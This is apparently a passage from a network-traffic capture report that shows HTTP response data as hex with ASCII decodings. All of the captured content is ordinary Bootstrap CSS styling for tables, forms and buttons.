3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 33 32 33
                                                                                                                                                                                Data Ascii: ,.075)}.table-hover .table-active:hover{background-color:rgba(0,0,0,.075)}.table-hover .table-active:hover>td,.table-hover .table-active:hover>th{background-color:rgba(0,0,0,.075)}.table .thead-dark th{color:#fff;background-color:#212529;border-color:#323
                                                                                                                                                                                2021-10-25 16:17:23 UTC67INData Raw: 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 2d 78 3a 61 75 74 6f 3b 2d 77 65 62 6b 69 74 2d 6f 76 65 72 66 6c 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 3b 2d 6d 73 2d 6f 76 65 72 66 6c 6f 77 2d 73 74 79 6c 65 3a 2d 6d 73 2d 61 75 74 6f 68 69 64 69 6e 67 2d 73 63 72 6f 6c 6c 62 61 72 7d 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 2d 78 6c 3e 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 7b 62 6f 72 64 65 72 3a 30 7d 7d 2e 74 61 62 6c 65 2d 72 65 73 70 6f 6e 73 69 76 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 2d 78 3a 61 75 74 6f 3b 2d 77 65 62 6b 69 74 2d 6f 76 65 72 66 6c 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 3b 2d 6d 73 2d 6f 76 65
                                                                                                                                                                                Data Ascii: lock;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch;-ms-overflow-style:-ms-autohiding-scrollbar}.table-responsive-xl>.table-bordered{border:0}}.table-responsive{display:block;width:100%;overflow-x:auto;-webkit-overflow-scrolling:touch;-ms-ove
                                                                                                                                                                                2021-10-25 16:17:23 UTC68INData Raw: 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 63 6f 6c 2d 66 6f 72 6d 2d 6c 61 62 65 6c 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 61 6c 63 28 2e 33 37 35 72 65 6d 20 2b 20 31 70 78 29 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 63 61 6c 63 28 2e 33 37 35 72 65 6d 20 2b 20 31 70 78 29 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 2e 63 6f 6c 2d 66 6f 72 6d 2d 6c 61 62 65 6c 2d 6c 67 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 61 6c 63 28 2e 35 72 65 6d 20 2b 20 31 70 78 29 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 63 61 6c 63 28 2e 35 72 65 6d 20 2b 20 31 70 78 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 6c 69 6e
                                                                                                                                                                                Data Ascii: y:block;width:100%}.col-form-label{padding-top:calc(.375rem + 1px);padding-bottom:calc(.375rem + 1px);margin-bottom:0;font-size:inherit;line-height:1.5}.col-form-label-lg{padding-top:calc(.5rem + 1px);padding-bottom:calc(.5rem + 1px);font-size:1.25rem;lin
                                                                                                                                                                                2021-10-25 16:17:23 UTC69INData Raw: 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 73 6d 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 70 70 65 6e 64 3e 2e 62 74 6e 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 70 70 65 6e 64 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 74 65 78 74 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 70 72 65 70 65 6e 64 3e 2e 62 74 6e 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 70 72 65 70 65 6e 64 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 74 65 78 74 7b 70 61 64 64 69 6e 67 3a 2e 32 35 72 65 6d 20 2e 35
                                                                                                                                                                                Data Ascii: form-control-sm,.input-group-sm>.form-control,.input-group-sm>.input-group-append>.btn,.input-group-sm>.input-group-append>.input-group-text,.input-group-sm>.input-group-prepend>.btn,.input-group-sm>.input-group-prepend>.input-group-text{padding:.25rem .5
                                                                                                                                                                                2021-10-25 16:17:23 UTC71INData Raw: 65 6e 64 3e 73 65 6c 65 63 74 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 74 65 78 74 3a 6e 6f 74 28 5b 73 69 7a 65 5d 29 3a 6e 6f 74 28 5b 6d 75 6c 74 69 70 6c 65 5d 29 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 6c 67 3e 73 65 6c 65 63 74 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 6e 6f 74 28 5b 73 69 7a 65 5d 29 3a 6e 6f 74 28 5b 6d 75 6c 74 69 70 6c 65 5d 29 2c 73 65 6c 65 63 74 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 67 3a 6e 6f 74 28 5b 73 69 7a 65 5d 29 3a 6e 6f 74 28 5b 6d 75 6c 74 69 70 6c 65 5d 29 7b 68 65 69 67 68 74 3a 63 61 6c 63 28 32 2e 38 37 35 72 65 6d 20 2b 20 32 70 78 29 7d 2e 66 6f 72 6d 2d 67 72 6f 75 70 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 2e 66 6f 72 6d 2d 74 65 78 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b
                                                                                                                                                                                Data Ascii: end>select.input-group-text:not([size]):not([multiple]),.input-group-lg>select.form-control:not([size]):not([multiple]),select.form-control-lg:not([size]):not([multiple]){height:calc(2.875rem + 2px)}.form-group{margin-bottom:1rem}.form-text{display:block;
                                                                                                                                                                                2021-10-25 16:17:23 UTC72INData Raw: 74 6f 6d 2d 73 65 6c 65 63 74 3a 76 61 6c 69 64 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 76 61 6c 69 64 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 38 61 37 34 35 7d 2e 63 75 73 74 6f 6d 2d 73 65 6c 65 63 74 2e 69 73 2d 76 61 6c 69 64 3a 66 6f 63 75 73 2c 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2e 69 73 2d 76 61 6c 69 64 3a 66 6f 63 75 73 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 63 75 73 74 6f 6d 2d 73 65 6c 65 63 74 3a 76 61 6c 69 64 3a 66 6f 63 75 73 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 76 61 6c 69 64 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 38 61 37 34 35 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32
                                                                                                                                                                                Data Ascii: tom-select:valid,.was-validated .form-control:valid{border-color:#28a745}.custom-select.is-valid:focus,.form-control.is-valid:focus,.was-validated .custom-select:valid:focus,.was-validated .form-control:valid:focus{border-color:#28a745;box-shadow:0 0 0 .2
                                                                                                                                                                                2021-10-25 16:17:23 UTC75INData Raw: 38 30 30 30 0d 0a 61 6c 69 64 2d 66 65 65 64 62 61 63 6b 2c 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 2e 69 73 2d 76 61 6c 69 64 7e 2e 76 61 6c 69 64 2d 74 6f 6f 6c 74 69 70 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 76 61 6c 69 64 7e 2e 76 61 6c 69 64 2d 66 65 65 64 62 61 63 6b 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 76 61 6c 69 64 7e 2e 76 61 6c 69 64 2d 74 6f 6f 6c 74 69 70 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 2e 69 73 2d 76 61 6c 69 64 3a 63 68 65 63 6b 65 64 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62
                                                                                                                                                                                Data Ascii: 8000alid-feedback,.custom-control-input.is-valid~.valid-tooltip,.was-validated .custom-control-input:valid~.valid-feedback,.was-validated .custom-control-input:valid~.valid-tooltip{display:block}.custom-control-input.is-valid:checked~.custom-control-lab
                                                                                                                                                                                2021-10-25 16:17:23 UTC76INData Raw: 6e 6f 6e 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 31 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 32 30 2c 35 33 2c 36 39 2c 2e 38 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 72 65 6d 7d 2e 63 75 73 74 6f 6d 2d 73 65 6c 65 63 74 2e 69 73 2d 69 6e 76 61 6c 69 64 2c 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2e 69 73 2d 69 6e 76 61 6c 69 64 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 63 75 73 74 6f 6d 2d 73 65 6c 65 63 74 3a 69 6e 76 61 6c 69 64 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e
                                                                                                                                                                                Data Ascii: none;max-width:100%;padding:.5rem;margin-top:.1rem;font-size:.875rem;line-height:1;color:#fff;background-color:rgba(220,53,69,.8);border-radius:.2rem}.custom-select.is-invalid,.form-control.is-invalid,.was-validated .custom-select:invalid,.was-validated .
                                                                                                                                                                                2021-10-25 16:17:23 UTC125INData Raw: 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 7b 63 6f 6c 6f 72 3a 23 64 63 33 35 34 35 7d 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 2e 69 73 2d 69 6e 76 61 6c 69 64 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 62 65 66 6f 72 65 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 69 6e 76 61 6c 69 64 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 66 61 32 61 39 7d 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 2e 69 73 2d 69 6e 76 61 6c 69 64 7e 2e 69 6e 76 61 6c 69 64 2d 66 65 65 64 62 61 63 6b 2c 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72
                                                                                                                                                                                Data Ascii: control-label{color:#dc3545}.custom-control-input.is-invalid~.custom-control-label::before,.was-validated .custom-control-input:invalid~.custom-control-label::before{background-color:#efa2a9}.custom-control-input.is-invalid~.invalid-feedback,.custom-contr
                                                                                                                                                                                2021-10-25 16:17:23 UTC126INData Raw: 69 6c 65 2d 6c 61 62 65 6c 2c 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 2e 63 75 73 74 6f 6d 2d 66 69 6c 65 2d 69 6e 70 75 74 3a 69 6e 76 61 6c 69 64 3a 66 6f 63 75 73 7e 2e 63 75 73 74 6f 6d 2d 66 69 6c 65 2d 6c 61 62 65 6c 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 32 32 30 2c 35 33 2c 36 39 2c 2e 32 35 29 7d 2e 66 6f 72 6d 2d 69 6e 6c 69 6e 65 7b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 66
                                                                                                                                                                                Data Ascii: ile-label,.was-validated .custom-file-input:invalid:focus~.custom-file-label{box-shadow:0 0 0 .2rem rgba(220,53,69,.25)}.form-inline{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-f
                                                                                                                                                                                2021-10-25 16:17:23 UTC128INData Raw: 6e 6c 69 6e 65 20 2e 66 6f 72 6d 2d 63 68 65 63 6b 2d 69 6e 70 75 74 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 32 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 66 6f 72 6d 2d 69 6e 6c 69 6e 65 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 66 6f
                                                                                                                                                                                Data Ascii: nline .form-check-input{position:relative;margin-top:0;margin-right:.25rem;margin-left:0}.form-inline .custom-control{-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.fo
                                                                                                                                                                                2021-10-25 16:17:23 UTC129INData Raw: 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 7d 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 2c 2e 62 74 6e 2d 70 72 69 6d 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 2c 2e 73 68 6f 77 3e 2e 62 74 6e 2d 70 72 69 6d 61 72 79 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 36 32 63 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 35 63 62 66 7d 2e 62 74 6e 2d 70 72 69 6d 61 72 79
                                                                                                                                                                                Data Ascii: #fff;background-color:#007bff;border-color:#007bff}.btn-primary:not(:disabled):not(.disabled).active,.btn-primary:not(:disabled):not(.disabled):active,.show>.btn-primary.dropdown-toggle{color:#fff;background-color:#0062cc;border-color:#005cbf}.btn-primary
                                                                                                                                                                                2021-10-25 16:17:23 UTC130INData Raw: 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 34 30 2c 31 36 37 2c 36 39 2c 2e 35 29 7d 2e 62 74 6e 2d 73 75 63 63 65 73 73 2e 64 69 73 61 62 6c 65 64 2c 2e 62 74 6e 2d 73 75 63 63 65 73 73 3a 64 69 73 61 62 6c 65 64 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 38 61 37 34 35 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 38 61 37 34 35 7d 2e 62 74 6e 2d 73 75 63 63 65 73 73 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 2c 2e 62 74 6e 2d 73 75 63 63 65 73 73 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 2c 2e 73 68 6f 77 3e 2e 62 74 6e 2d 73 75 63 63 65 73
                                                                                                                                                                                Data Ascii: hadow:0 0 0 .2rem rgba(40,167,69,.5)}.btn-success.disabled,.btn-success:disabled{color:#fff;background-color:#28a745;border-color:#28a745}.btn-success:not(:disabled):not(.disabled).active,.btn-success:not(:disabled):not(.disabled):active,.show>.btn-succes
                                                                                                                                                                                2021-10-25 16:17:23 UTC132INData Raw: 2e 66 6f 63 75 73 2c 2e 62 74 6e 2d 77 61 72 6e 69 6e 67 3a 66 6f 63 75 73 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 32 35 35 2c 31 39 33 2c 37 2c 2e 35 29 7d 2e 62 74 6e 2d 77 61 72 6e 69 6e 67 2e 64 69 73 61 62 6c 65 64 2c 2e 62 74 6e 2d 77 61 72 6e 69 6e 67 3a 64 69 73 61 62 6c 65 64 7b 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 63 31 30 37 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 66 63 31 30 37 7d 2e 62 74 6e 2d 77 61 72 6e 69 6e 67 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 2c 2e 62 74 6e 2d 77 61 72 6e 69 6e 67 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e
                                                                                                                                                                                Data Ascii: .focus,.btn-warning:focus{box-shadow:0 0 0 .2rem rgba(255,193,7,.5)}.btn-warning.disabled,.btn-warning:disabled{color:#212529;background-color:#ffc107;border-color:#ffc107}.btn-warning:not(:disabled):not(.disabled).active,.btn-warning:not(:disabled):not(.
                                                                                                                                                                                2021-10-25 16:17:23 UTC133INData Raw: 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 32 65 36 65 61 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 61 65 30 65 35 7d 2e 62 74 6e 2d 6c 69 67 68 74 2e 66 6f 63 75 73 2c 2e 62 74 6e 2d 6c 69 67 68 74 3a 66 6f 63 75 73 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 32 34 38 2c 32 34 39 2c 32 35 30 2c 2e 35 29 7d 2e 62 74 6e 2d 6c 69 67 68 74 2e 64 69 73 61 62 6c 65 64 2c 2e 62 74 6e 2d 6c 69 67 68 74 3a 64 69 73 61 62 6c 65 64 7b 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 38 66 39 66 61 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 38 66 39 66 61 7d 2e 62 74 6e 2d 6c 69 67 68 74 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73
                                                                                                                                                                                Data Ascii: kground-color:#e2e6ea;border-color:#dae0e5}.btn-light.focus,.btn-light:focus{box-shadow:0 0 0 .2rem rgba(248,249,250,.5)}.btn-light.disabled,.btn-light:disabled{color:#212529;background-color:#f8f9fa;border-color:#f8f9fa}.btn-light:not(:disabled):not(.dis
                                                                                                                                                                                2021-10-25 16:17:23 UTC134INData Raw: 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 2e 66 6f 63 75 73 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 3a 66 6f 63 75 73 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 30 2c 31 32 33 2c 32 35 35 2c 2e 35 29 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 2e 64 69 73 61 62 6c 65 64 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 70 72 69 6d 61 72 79 3a 64 69 73 61 62 6c 65 64 7b
                                                                                                                                                                                Data Ascii: -color:#007bff}.btn-outline-primary:hover{color:#fff;background-color:#007bff;border-color:#007bff}.btn-outline-primary.focus,.btn-outline-primary:focus{box-shadow:0 0 0 .2rem rgba(0,123,255,.5)}.btn-outline-primary.disabled,.btn-outline-primary:disabled{
                                                                                                                                                                                2021-10-25 16:17:23 UTC136INData Raw: 6e 65 2d 73 65 63 6f 6e 64 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 73 65 63 6f 6e 64 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 2e 73 68 6f 77 3e 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 73 65 63 6f 6e 64 61 72 79 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 3a 66 6f 63 75 73 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 31 30 38 2c 31 31 37 2c 31 32 35 2c 2e 35 29 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 73 75 63 63 65 73 73 7b 63 6f 6c 6f 72 3a 23 32 38 61 37 34 35 3b 62 61 63
                                                                                                                                                                                Data Ascii: ne-secondary:not(:disabled):not(.disabled).active:focus,.btn-outline-secondary:not(:disabled):not(.disabled):active:focus,.show>.btn-outline-secondary.dropdown-toggle:focus{box-shadow:0 0 0 .2rem rgba(108,117,125,.5)}.btn-outline-success{color:#28a745;bac
                                                                                                                                                                                2021-10-25 16:17:23 UTC137INData Raw: 65 64 7b 63 6f 6c 6f 72 3a 23 31 37 61 32 62 38 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 69 6e 66 6f 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 69 6e 66 6f 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 2c 2e 73 68 6f 77 3e 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 69 6e 66 6f 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 37 61 32 62 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 37 61 32 62 38 7d 2e 62
                                                                                                                                                                                Data Ascii: ed{color:#17a2b8;background-color:transparent}.btn-outline-info:not(:disabled):not(.disabled).active,.btn-outline-info:not(:disabled):not(.disabled):active,.show>.btn-outline-info.dropdown-toggle{color:#fff;background-color:#17a2b8;border-color:#17a2b8}.b
                                                                                                                                                                                2021-10-25 16:17:23 UTC138INData Raw: 69 6d 61 67 65 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 63 33 35 34 35 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 6e 67 65 72 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 63 33 35 34 35 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 63 33 35 34 35 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 6e 67 65 72 2e 66 6f 63 75 73 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 6e 67 65 72 3a 66 6f 63 75 73 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 32 32 30 2c 35 33 2c 36 39 2c 2e 35 29 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 6e 67 65 72 2e 64 69 73 61 62 6c 65 64 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 6e 67
                                                                                                                                                                                Data Ascii: image:none;border-color:#dc3545}.btn-outline-danger:hover{color:#fff;background-color:#dc3545;border-color:#dc3545}.btn-outline-danger.focus,.btn-outline-danger:focus{box-shadow:0 0 0 .2rem rgba(220,53,69,.5)}.btn-outline-danger.disabled,.btn-outline-dang
                                                                                                                                                                                2021-10-25 16:17:23 UTC140INData Raw: 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 6c 69 67 68 74 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 2e 73 68 6f 77 3e 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 6c 69 67 68 74 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 3a 66 6f 63 75 73 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 32 34 38 2c 32 34 39 2c 32 35 30 2c 2e 35 29 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 72 6b 7b 63 6f 6c 6f 72 3a 23 33 34 33 61 34 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d
